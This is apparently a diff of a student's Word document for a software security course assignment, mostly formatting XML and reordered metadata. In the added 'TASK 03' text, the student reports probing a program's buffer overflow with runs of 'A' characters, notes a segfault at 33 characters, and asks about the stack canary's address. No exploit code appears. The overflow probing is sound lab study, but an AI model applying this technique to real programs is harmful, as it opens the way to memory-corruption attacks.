+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5124,6 +5594,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -5143,7 +5614,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5284,7 +5755,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId15">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5478,7 +5949,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5660,7 +6131,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Source: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId15" w:anchor="solving-the-system-crash" w:history="1">
+      <w:hyperlink r:id="rId17" w:anchor="solving-the-system-crash" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5721,9 +6192,434 @@
         </w:rPr>
       </w:pPr>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>TASK 03</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Responding with 32 A’s, I get output f7f9f600.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38653337" wp14:editId="61E2F44D">
+            <wp:extent cx="5972810" cy="4277360"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
+            <wp:docPr id="1470968475" name="Picture 1" descr="A computer screen shot of a computer program&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1470968475" name="Picture 1" descr="A computer screen shot of a computer program&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="4277360"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>If I input 33 and then 34 A’s I get seg. fault and the following response:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51EA301D" wp14:editId="6CEB0FF4">
+            <wp:extent cx="5972810" cy="3073400"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="2096153518" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2096153518" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="3073400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Is the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>argv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> address the address of the canary?</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId16"/>
-      <w:footerReference w:type="default" r:id="rId17"/>
+      <w:headerReference w:type="default" r:id="rId20"/>
+      <w:footerReference w:type="default" r:id="rId21"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -6803,7 +7699,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="0031552A"/>
+    <w:rsid w:val="001F34F3"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -7279,6 +8175,23 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x0101007BCD34C5F2D32C4AAAB044270ECA57DA" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="63e273ac3b51b78697e2c3ceb21950bb">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="96aa0b68-977f-4d68-9084-1e0376ff8ae9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1452b4192b6f4abe265f2bac6a64a404" ns3:_="">
     <xsd:import namespace="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
@@ -7456,24 +8369,25 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4C90A798-53B0-4DA2-8331-5495FD97601A}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -7489,22 +8403,4 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
 </file>
--- a/CA1/CA1_INF226_fha040.docx
+++ b/CA1/CA1_INF226_fha040.docx
@@ -2,6 +2,38 @@
